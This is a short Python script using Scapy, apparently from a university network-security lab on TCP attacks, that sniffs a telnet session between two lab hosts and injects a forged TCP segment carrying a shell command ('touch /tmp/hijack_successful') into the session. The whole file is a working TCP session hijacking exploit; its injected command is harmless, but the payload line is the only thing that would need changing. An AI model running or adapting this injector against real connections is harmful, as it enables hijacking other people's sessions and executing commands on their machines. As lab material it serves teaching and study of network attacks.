nudtns2026spring/Tcp/Labsetup/volumes/hijack_attack.py

#!/usr/bin/env python3
from scapy.all import *

def hijack(pkt):
    if pkt[TCP].payload:
        data = bytes(pkt[TCP].payload)
        print("Packet from {} to {} with payload: {}".format(pkt[IP].src, pkt[IP].dst, data))
        
        # Look for 'id' which I sent in the telnet session
        if b'id' in data:
            print("Target command detected. Injecting...")
            ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
            tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport, flags="A",
                      seq=pkt[TCP].seq + len(pkt[TCP].payload), ack=pkt[TCP].ack)
            
            payload = "\r touch /tmp/hijack_successful \r"
            res = ip/tcp/payload
            send(res, verbose=0)
            print("Sent hijacked packet.")
            exit(0)

print("Sniffing...")
sniff(iface="br-603d3788c443", filter="tcp and src host 10.9.0.6 and dst host 10.9.0.5", prn=hijack)